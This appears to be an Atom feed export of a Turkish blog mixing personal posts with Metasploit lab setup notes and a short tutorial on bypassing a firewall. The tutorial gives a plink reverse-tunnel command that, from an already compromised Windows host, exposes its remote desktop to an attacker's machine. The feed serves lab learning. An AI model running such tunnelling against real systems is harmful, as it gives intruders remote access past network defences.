<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-2887209772609553434</id><updated>2012-02-15T13:08:32.835-08:00</updated><category term='kendimden'/><category term='penetration'/><category term='sqlinjection'/><category term='mssql injection'/><category term='şeker'/><category term='guvenlik'/><category term='blog'/><category term='murat'/><category term='reverse'/><category term='mssql'/><category term='nmap'/><title type='text'>mrtskr.blogspot.com | Murat ŞEKER</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://mrtskr.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2887209772609553434/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://mrtskr.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>Murat ŞEKER</name><uri>http://www.blogger.com/profile/13786234878004274832</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://3.bp.blogspot.com/_hxteRo6O_s0/TNFQDMvPkEI/AAAAAAAAABc/VHLZhZ32F-I/S220/zT.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>21</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-2887209772609553434.post-5926957003225624894</id><published>2012-01-28T15:00:00.000-08:00</published><updated>2012-01-28T15:05:11.136-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='kendimden'/><title type='text'>Eringenlik ve Ben</title><content type='html'>Konuya nereden girsem, nasıl başlasam bilemiyorum ama kabul ediyorum "Murat!! Eringensin abi eringen" diyenlere ben de "Haklısın abi eringenim ama nabayım ?" demekten başka birşey gelmiyor aklıma. Hep birşeyleri erteliyorum "amaan nede olsa yarın zaman bol hallederim" diyorum fakat bugün "oyun oynarken" düşünme fırsatı buldum (evet oyun oynarken yanlış okumadın sayın okur" Niye bu eringenlik? Kendime bu soruyu yönelttim ve güzelde bir cevap buldum. Sadece "Bıkkınlık" hani birşeyleri istersin, çabalarsın ucu görünür daha sonra kaçar gider ya işte buda böyle birşey. Ama suç kimde ?? Tabiki bende.. İstediğim şeyleri elde edemediğimi daha doğrusu yeterince çabalamadığımı farkedince kendime bir tokat attım (gerçekten) arkadaşım "Nabıyon lan manyak" diyince kendime geldim. "ya abi hebe hube" derken yeni bir karar aldım. Hayatı ıskalamaya gelmez. Birşeyi istiyorsan çabalayacaksın, Durmadan çalışacaksın başka çaresi yok !! Hadi bakalım Murat göreyim seni...&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2887209772609553434-5926957003225624894?l=mrtskr.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://mrtskr.blogspot.com/feeds/5926957003225624894/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://mrtskr.blogspot.com/2012/01/eringenlik-ve-ben.html#comment-form' title='0 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2887209772609553434/posts/default/5926957003225624894'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2887209772609553434/posts/default/5926957003225624894'/><link rel='alternate' type='text/html' href='http://mrtskr.blogspot.com/2012/01/eringenlik-ve-ben.html' title='Eringenlik ve Ben'/><author><name>Murat ŞEKER</name><uri>http://www.blogger.com/profile/13786234878004274832</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://3.bp.blogspot.com/_hxteRo6O_s0/TNFQDMvPkEI/AAAAAAAAABc/VHLZhZ32F-I/S220/zT.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2887209772609553434.post-4066130832230472596</id><published>2012-01-11T11:17:00.000-08:00</published><updated>2012-01-11T11:18:42.070-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='kendimden'/><title type='text'>Tema</title><content type='html'>İlk iş olarak blogum için tema aradım ama internette istediğim gibi birşey bulamadım malesef. E iş başa düştü biraz css biraz blogger değişkenleriyle bu iş halolur diye düşünüyorum :) Hadi hayırlısı.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2887209772609553434-4066130832230472596?l=mrtskr.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://mrtskr.blogspot.com/feeds/4066130832230472596/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://mrtskr.blogspot.com/2012/01/tema.html#comment-form' title='0 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2887209772609553434/posts/default/4066130832230472596'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2887209772609553434/posts/default/4066130832230472596'/><link rel='alternate' type='text/html' href='http://mrtskr.blogspot.com/2012/01/tema.html' title='Tema'/><author><name>Murat ŞEKER</name><uri>http://www.blogger.com/profile/13786234878004274832</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://3.bp.blogspot.com/_hxteRo6O_s0/TNFQDMvPkEI/AAAAAAAAABc/VHLZhZ32F-I/S220/zT.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2887209772609553434.post-206913280106882611</id><published>2011-12-30T07:06:00.001-08:00</published><updated>2011-12-30T07:07:19.905-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='kendimden'/><title type='text'>Bilgi İşlem ? ^^</title><content type='html'>Merhaba.&lt;br /&gt;Yaklaşık 6 Aydır Çalıştığım Kars Belediyesi'nden Geçtiğimiz Hafta Çarşamba Gününden Beri Ayrıldım. Sebebi Karışık ve Yeni İş Arayışları İçerisindeyim. E İş Yokken Blogla Biraz İlgilenmem Gerek Değil mi ? :)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2887209772609553434-206913280106882611?l=mrtskr.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://mrtskr.blogspot.com/feeds/206913280106882611/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://mrtskr.blogspot.com/2011/12/bilgi-islem.html#comment-form' title='2 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2887209772609553434/posts/default/206913280106882611'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2887209772609553434/posts/default/206913280106882611'/><link rel='alternate' type='text/html' href='http://mrtskr.blogspot.com/2011/12/bilgi-islem.html' title='Bilgi İşlem ? ^^'/><author><name>Murat ŞEKER</name><uri>http://www.blogger.com/profile/13786234878004274832</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://3.bp.blogspot.com/_hxteRo6O_s0/TNFQDMvPkEI/AAAAAAAAABc/VHLZhZ32F-I/S220/zT.gif'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2887209772609553434.post-1737929827266701103</id><published>2011-09-04T06:39:00.000-07:00</published><updated>2011-09-04T06:43:13.860-07:00</updated><title type='text'>Metasploit 1 - Test Lab Kurulumu</title><content type='html'>&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:courier new;"&gt;METASPLOİT  1 - Test Lab Kurulumu&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;Merhaba&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;Uzun Zamandır Kafamdaydı Metasploit'in Herşeyini Anlatacak Bir Video Serisi. 1. Videoyu Bitirdim 2. Ne Zaman Gelir Net Tarih Veremiyorum Ama Kesin Gelecek..&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;Bu Videoda Metasploit Hakkında Kısa Bilgi Verdikten Sonra Test Lab Kurulumunu Anlattım. Video Seslidir..&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;Videodaki Konular ;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;Metasploit Nedir ?&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;Vulnerability, Exploit, Payload Kavramları&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;Test Lab Kurulumu&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;Videoda Framework'un Geç Yüklenmesinden Dolayı Hata Meydana Geleceğini Tahmin Etmiştim. Bendeki Hatayı Alanlar Framework'u Silip Tekrar Yüklerseler Sorun Düzelir (Bende Öyle Düzeldi)&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;Aynı Zamanda SQL Serverın Bir Ayarınıda Eksik Anlatmışım;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;TCP/IP Sekmesindeki Listen All'u NO Yapın..&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;Videoyu Vimeo'ya Upload Ettim.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;iframe style="font-family: courier new;" src="http://player.vimeo.com/video/28572884?title=0&amp;amp;byline=0&amp;amp;portrait=0" frameborder="0" height="300" width="400"&gt;&lt;/iframe&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;Vimeo Link ;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;http://www.vimeo.com/28572884&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;Videodaki Programlar ;&lt;/span&gt; &lt;/span&gt;&lt;span style="font-size:100%;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;Net Framework 2.0 : &lt;/span&gt;&lt;a style="font-family: courier new;" href="http://www.microsoft.com/downloads/tr-tr/details.aspx?FamilyID=0856eacb-4362-4b0d-8edd-aab15c5e04f5&amp;amp;pf=true"&gt;İndir&lt;/a&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;SQL Server Express 2005 : &lt;/span&gt;&lt;a style="font-family: courier new;" href="http://www.microsoft.com/download/en/details.aspx?id=21844"&gt;İndir&lt;/a&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;SQL Server Management Studio Express : &lt;/span&gt;&lt;a style="font-family: courier new;" href="http://www.microsoft.com/download/en/details.aspx?id=8961"&gt;İndir&lt;/a&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;Web Application : &lt;/span&gt;&lt;a style="font-family: courier new;" href="http://www.secmaniac.com/files/nostarch1.zip"&gt;İndir&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;Soru ve Sorunlarınızı Buradan veya Mail İle Paylaşabilirsiniz. Elimden Geldiğince Cevaplamaya Çalışacağım..&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2887209772609553434-1737929827266701103?l=mrtskr.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://mrtskr.blogspot.com/feeds/1737929827266701103/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://mrtskr.blogspot.com/2011/09/metasploit-1-test-lab-kurulumu.html#comment-form' title='4 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2887209772609553434/posts/default/1737929827266701103'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2887209772609553434/posts/default/1737929827266701103'/><link rel='alternate' type='text/html' href='http://mrtskr.blogspot.com/2011/09/metasploit-1-test-lab-kurulumu.html' title='Metasploit 1 - Test Lab Kurulumu'/><author><name>Murat ŞEKER</name><uri>http://www.blogger.com/profile/13786234878004274832</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://3.bp.blogspot.com/_hxteRo6O_s0/TNFQDMvPkEI/AAAAAAAAABc/VHLZhZ32F-I/S220/zT.gif'/></author><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2887209772609553434.post-3778179138192087188</id><published>2011-08-26T07:55:00.000-07:00</published><updated>2011-08-26T08:00:09.770-07:00</updated><title type='text'>Metasploit PostgreSQL Kurulumu</title><content type='html'>Merhabalar&lt;br /&gt;Bir Önceki Yazımda Makale Şeklinde Anlatımının Linkini Vermiştim Ama Hatalarla Dönen Mail'ler Gördüm Ben de Farklı Yöntemle (Kendi Kullandığım) Anlatımını Videoya Çektim.. Hostname'i zero Olarak Değiştiğim İçin Birkaç Yerde Hata Var Siz Onlara Aldırış Etmeyin.. Videoyu Alttan İzleyebilirsiniz..&lt;br /&gt;&lt;br /&gt;&lt;iframe src="http://player.vimeo.com/video/28197634?title=0&amp;amp;byline=0&amp;amp;portrait=0" width="400" height="300" frameborder="0"&gt;&lt;/iframe&gt;&lt;p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2887209772609553434-3778179138192087188?l=mrtskr.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://mrtskr.blogspot.com/feeds/3778179138192087188/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://mrtskr.blogspot.com/2011/08/metasploit-postgresql-kurulumu.html#comment-form' title='0 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2887209772609553434/posts/default/3778179138192087188'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2887209772609553434/posts/default/3778179138192087188'/><link rel='alternate' type='text/html' href='http://mrtskr.blogspot.com/2011/08/metasploit-postgresql-kurulumu.html' title='Metasploit PostgreSQL Kurulumu'/><author><name>Murat ŞEKER</name><uri>http://www.blogger.com/profile/13786234878004274832</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://3.bp.blogspot.com/_hxteRo6O_s0/TNFQDMvPkEI/AAAAAAAAABc/VHLZhZ32F-I/S220/zT.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2887209772609553434.post-1598387639550826018</id><published>2011-07-15T01:06:00.001-07:00</published><updated>2011-07-15T01:18:53.223-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='kendimden'/><title type='text'>Metasploit &amp; Kafayı Yeme Noktası</title><content type='html'>Merhabalar..&lt;br /&gt;Malum Tekrar Aktif Olarak Bilgisayar Dünyasına Adım Attım. Hem Metasploitteki Eski Bilgilerimi Tazelemek Hem de Geçmişteki Bir Projemi (Metasploit Hakkında Detaylı Makale ve Videolar) Tekrar Hayata Geçirmek Amacıyla BT5i İndirdim (5i çıkmış :D). Herneyse VMWare'e BT5'i Kurdum Kendime Göre Ayarlarını vs Yaptım ve Büyük Bir Heyecanla Konsola "./msfconsole" Yazdım Tabi cd /pentest/exploits/framework3 yazdıktan sonra :).. &lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;Eskiden Çok Hoşuma Giden db_autopwn 'i Denemek İstedim. http://www.blogger.com/img/blank.gif"service mysql start" Komutunu Verdikten Sonra db_driver Yazdım Oda Ne ? "No Active Driver" Altta Yönergeler Vardı İyi Güzel Dedim Yaptım Ama Oda Pek İşe Yaramadı. Başladım İnternetten Araştırmaya Ortalıkta ADam Gibi Birşey Yok. Sonra CEHTurkiye'deki Ozan UÇAR'a mail attım Oda PostgreSQL Kullandığını, Kısa Zamanda Döküman Yazacağını Söyledi. Ama Benim Kısa Zamanım Yoktu :) Herneyse PostgreSQL Hakkında Birşeyler Araştırdım ve Kurduktan Sonra İçim Gayet Rahatladı. PostgreSQL Nasıl kurulur vs Bunlar Hakkında Bilgi Vermeyeceğim Çünkü Benim Anlatacaklarımdan Daha Fazlası Aşağıda Vereceğim Linkte Mevcut.. Şimdiden Sömürün :))&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.cehturkiye.com/index.php/2011/07/11/metasploit-autopwn-ile-otomotik-pentest/metasploit-autopwn-ile-otomotik-pentest.html"&gt;http://www.cehturkiye.com/index.php/2011/07/11/metasploit-autopwn-ile-otomotik-pentest/metasploit-autopwn-ile-otomotik-pentest.html&lt;br /&gt;&lt;/a&gt;&lt;br /&gt;Hade Kolay Gele&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2887209772609553434-1598387639550826018?l=mrtskr.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://mrtskr.blogspot.com/feeds/1598387639550826018/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://mrtskr.blogspot.com/2011/07/metasploit-kafay-yeme-noktas.html#comment-form' title='0 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2887209772609553434/posts/default/1598387639550826018'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2887209772609553434/posts/default/1598387639550826018'/><link rel='alternate' type='text/html' href='http://mrtskr.blogspot.com/2011/07/metasploit-kafay-yeme-noktas.html' title='Metasploit &amp; Kafayı Yeme Noktası'/><author><name>Murat ŞEKER</name><uri>http://www.blogger.com/profile/13786234878004274832</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://3.bp.blogspot.com/_hxteRo6O_s0/TNFQDMvPkEI/AAAAAAAAABc/VHLZhZ32F-I/S220/zT.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2887209772609553434.post-7662185224474577068</id><published>2011-07-14T03:57:00.001-07:00</published><updated>2011-07-14T04:12:04.497-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='kendimden'/><title type='text'>Nerelerdeyim ?</title><content type='html'>Aslına bakarsanız nerelerdeyim, ne yapıyorum, ne yaptım ben de bilmiyorum malesef. Bazen kendimi kaybediyorum bazende tekrar buluyorum. Ama bulduktan sonra bir türlü dikiş tutturamıyorum kaçıyor benliğim benden:) neyse uzatmayayım. Evet yaklaşık "1" yıldır blog'a birşeyler karalamıyorum. Hatta bırakın blog'u bilgisayardan o kadar soğumuştumki oturasım yoktu. Oturduğum zaman ya msn,facebook ile uğraşıyordum ya da fizy'den mp3 dinliyordum. Peki 1 yıl içinde ne oldu ne bitti blog'umu takip edenlerin hiçbiri bilmiyor hatta sanaldan arkadaşlık yaptığım insanların çoğuda bilmiyor. Devamı yazısına tıklayında biraz hitim artsın :P&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;Son 7 ayda hayatımda köklü değişiklikler yaptım daha önceden Artvin'in Ardanuç ilçesinde yaşıyordum Ocak ayının 6sı gibiydi sanırım yada öyle bişe ama 10'unu geçmemişti eminim :D Artvin'den ilişkiyi kestikten sonra 2 günlük İstanbul maceram oldu ordan Giresun ve Memleketime gittim. Memleketimde tanıdık bir abimle CD/DVD dükkanı açtık (açtık diyorsam kurulu düzendi sadece bakacak birisi lazımdı) evet düşündüğünüz gibi KORSAN (karşıyım ama para için mecburdu hayat zor..) orada 1 hafta siftah yapamadıktan sonra (evlere internet geldi mertlik bozuldu :D) baktık olmayacak kapattık dükkanı. Sonra tekrar Giresun'a gittim,en son durağım ve hala bulunduğum (Mart Ayında) yer KARS'ta yaşıyorum. İlk geldiğim zaman bir kırtasiyede işe başladım 2 ay ki sürede Kars'a tam anlamıyla yerleştim. Derken kırtasiye ile anlaşamamaya başladım artık bağlar kopmak üzereydi. Derken burda Kent Konseyi Kadın Meclisi başkanı tatlımı tatlı iyimi iyi bir hanımla arkadaşım vasıtası ile tanıştım. Şansıma onlarada bilgisayarcı lazımmış :) Erzincan'da eğitim varmış gidermisin dediler hem tatil yapmak adına hem de birşeyler öğrenmeyi umarak kabul ettim. Tabi Erzincan'a gitmeden 1 gün önce müfredat bize mail ile bildirildi müfredatı gördükten 30 dk sonrasını hatırlamıyorum. Çünkü bildiğim şeylerdi. 1 Hafta Erzincan'da eğitim gördükten sonra Kars'a geri döndüm (bu arada kırtasiyedeki işimden ayrıldım) yine o tatlı ablam sayesinde Belediye Başkanı ile tanıştım belediyede "belki" iş bulurum diye CV bıraktım ablamda sağolsun işlemleri hızlandırdı derken 3 Hafta içinde yani bu yazıyı yazdığım tarihten 1 hafta önce Kars Belediyesi'nin Bilgi İşlem Biriminde çalışmaya başladım. Ne kadar maaş alacağım ne yapacağım pek bilgim yok ama zamanla hereşyi öğrenirim :). Bu yazıyıda hem onları bilgilendirmek hem de tekrar bilgisayara ısınmaya başladığımı söylemek için yazdım :) hadi hayırlısı diyelim.. Açığım çok. Dolayısıyla çok çalışmam lazım ne demiş Sakıp SABANCI : Çalışmak, Çalışmak, Çalışmak...&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2887209772609553434-7662185224474577068?l=mrtskr.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://mrtskr.blogspot.com/feeds/7662185224474577068/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://mrtskr.blogspot.com/2011/07/nerelerdeyim.html#comment-form' title='4 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2887209772609553434/posts/default/7662185224474577068'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2887209772609553434/posts/default/7662185224474577068'/><link rel='alternate' type='text/html' href='http://mrtskr.blogspot.com/2011/07/nerelerdeyim.html' title='Nerelerdeyim ?'/><author><name>Murat ŞEKER</name><uri>http://www.blogger.com/profile/13786234878004274832</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://3.bp.blogspot.com/_hxteRo6O_s0/TNFQDMvPkEI/AAAAAAAAABc/VHLZhZ32F-I/S220/zT.gif'/></author><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2887209772609553434.post-5942694556834309555</id><published>2010-08-03T01:32:00.000-07:00</published><updated>2010-10-26T04:01:24.270-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='guvenlik'/><category scheme='http://www.blogger.com/atom/ns#' term='kendimden'/><title type='text'>SSH Tünelleme İle Firewall Bypass</title><content type='html'>&lt;strong&gt;&lt;span style="font-size:78%;"&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;İçerik&lt;br /&gt;&lt;/span&gt;Bu Makalede SSH Tünelleme Yapılarak Firewall Arkasındaki Uzak Masaüstü Protokolüne Erişimin Nasıl Gerçekleştirileceği Anlatılmıştır.&lt;br /&gt;&lt;br /&gt;&lt;span style="color:red;"&gt;SSH Nedir ?&lt;/span&gt;&lt;br /&gt;SSH (Secure Shell Kısaltması) İki bilgisayar Arasında Güvenli Bağlantı Oluşturmak İçin Kullanılır. SSH Komut Satırı Arayüzü Kullanır. SSH’e Güvenli Telnette Denilebilir.&lt;br /&gt;SSH Hakkında Detaylı Bilgi İçin &lt;/span&gt;&lt;/strong&gt;&lt;a target="_blank" href="http://tr.wikipedia.org/wiki/SSH"&gt;     Buradan&lt;/a&gt;&lt;span style="font-family:Verdana,Arial,Helvetica,sans-serif;"&gt;&lt;strong&gt;&lt;span style="font-size:78%;"&gt; Faydalanabilirsiniz.&lt;br /&gt;&lt;br /&gt;&lt;span style="color:red;"&gt;SSH Tünelleme (SSH Tunneling)&lt;/span&gt;&lt;br /&gt;Eğer İçeriklere Ulaşmayı Engelleyecek Bir Yazılım/Donanım (Firewall) Varsa; SSH İle Bir Tünel Oluşturulup (Server-Client) Gelen Bağlantılar SSH’e Yönlendirilebilir. Böylelikle Yönlendirilen Sisteme Gönderilen İstekler Servera Gidiyormuş Gibi Görünür ve Cevaplanır.&lt;br /&gt;&lt;br /&gt;&lt;span style="color:red;"&gt;SSH Tünelleme İle Güvenlik Duvarı Atlatma (Firewall Bypass)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/strong&gt;&lt;strong&gt;&lt;span style="font-size:78%;"&gt;&lt;span style="color:blue;"&gt;Senaryo&lt;br /&gt;&lt;/span&gt;Saldırgan : Uzak Masaüstü Yapacağı Sisteme Erişmiştir (Meterpreter, Reverse Shell). Bu Makalede Reverse Shell Baz Alınacaktır.&lt;br /&gt;Hedef : Router / Firewall NAT Arkasında ve Uzak Masaüstü Portuna Gelen Bütün Bağlantı İsteklerini Engelliyor (Sadece Belirli IP ’ler)&lt;br /&gt;Amaç : Hedef Sisteme Uzak Masaüstü Bağlantısı Yapmak&lt;br /&gt;&lt;br /&gt;&lt;span style="color:blue;"&gt;Kullanılan Araçlar&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;/strong&gt;&lt;/span&gt;&lt;a target="_blank" href="http://www.chiark.greenend.org.uk/%7Esgtatham/putty/download.html"&gt;     Plink&lt;/a&gt;&lt;span style=";font-family:Verdana,Arial,Helvetica,sans-serif;font-size:78%;"  &gt;&lt;strong&gt; : SSH İstemcisi&lt;br /&gt;&lt;/strong&gt;&lt;/span&gt;&lt;a target="_blank" href="http://www.backtrack-linux.org/"&gt;     Backtrack Live CD&lt;/a&gt;&lt;span style=";font-family:Verdana,Arial,Helvetica,sans-serif;font-size:78%;"  &gt;&lt;strong&gt; : Güvenlik Araçlarının Bulunduğu Linux İşletim Sistemi&lt;br /&gt;&lt;br /&gt;Saldırgan IP : 192.168.52.129 &gt; BackTrack Linux&lt;br /&gt;Hedef IP : 192.168.128.131 &gt; Windows&lt;br /&gt;&lt;br /&gt;SSH İstemcisi Plink Upload Ettikten Sonra SSH Tüneli Oluşturalım;&lt;br /&gt;&lt;br /&gt;Komut ;&lt;br /&gt;&lt;span style="color:blue;"&gt;plink -P 22 -l root -pw zero -C -R 3389:localhost:3389 192.168.52.129&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;img src="http://img840.imageshack.us/img840/5724/18399242.png" /&gt;&lt;br /&gt;&lt;br /&gt;Yani;&lt;br /&gt;&lt;span style="color:blue;"&gt;plink -P "&lt;span style="color:red;"&gt;ssh srv port&lt;/span&gt;" -l "&lt;span style="color:red;"&gt;ssh svr user&lt;/span&gt;" -pw "&lt;span style="color:red;"&gt;ssh svr pass&lt;/span&gt;" -C -R "&lt;span style="color:red;"&gt;yerel port&lt;/span&gt;":localhost(127.0.0.1):"&lt;span style="color:red;"&gt;uzak port&lt;/span&gt;" "&lt;span style="color:red;"&gt;ssh svr ip&lt;/span&gt;"&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Parametreler;&lt;br /&gt;-p : Port&lt;br /&gt;-l : SSH Kul.&lt;br /&gt;-pw : Şifre&lt;br /&gt;-C : Sıkıştırma&lt;br /&gt;-R : Port Yönlendirme (Uzaktan Yerele)&lt;br /&gt;&lt;br /&gt;ve Bingo !&lt;br /&gt;&lt;br /&gt;&lt;img src="http://img199.imageshack.us/img199/3194/46703091.png" /&gt;&lt;br /&gt;&lt;br /&gt;RDP Emrinizdedir.&lt;br /&gt;&lt;/strong&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2887209772609553434-5942694556834309555?l=mrtskr.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://mrtskr.blogspot.com/feeds/5942694556834309555/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://mrtskr.blogspot.com/2010/08/ssh-tunelleme-ile-firewall-bypass.html#comment-form' title='1 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2887209772609553434/posts/default/5942694556834309555'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2887209772609553434/posts/default/5942694556834309555'/><link rel='alternate' type='text/html' href='http://mrtskr.blogspot.com/2010/08/ssh-tunelleme-ile-firewall-bypass.html' title='SSH Tünelleme İle Firewall Bypass'/><author><name>Murat ŞEKER</name><uri>http://www.blogger.com/profile/13786234878004274832</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://3.bp.blogspot.com/_hxteRo6O_s0/TNFQDMvPkEI/AAAAAAAAABc/VHLZhZ32F-I/S220/zT.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2887209772609553434.post-7235142940267760120</id><published>2010-07-21T13:07:00.000-07:00</published><updated>2010-07-21T13:13:31.474-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='kendimden'/><title type='text'>Tatil(!)</title><content type='html'>Merhabalar Uzun Zamandır Blog'a Hiçbirşey Yazmamıştım 15 Gün Önce Memleketime Gittim Akraba, Akran Ziyaretleri vs Derken Geri Döndüm Bundan Sonra Blogla Daha Çok İlgileneceğim Şimdiden Duyurulur :)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' 